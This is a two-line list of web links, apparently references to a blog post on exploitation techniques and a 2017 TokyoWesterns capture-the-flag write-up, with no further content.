- http://www.hardtobelieve.me/index.php/2017/02/16/uba-and-fsop/
- http://uaf.io/exploitation/2017/09/03/TokyoWesterns-2017-Parrot.html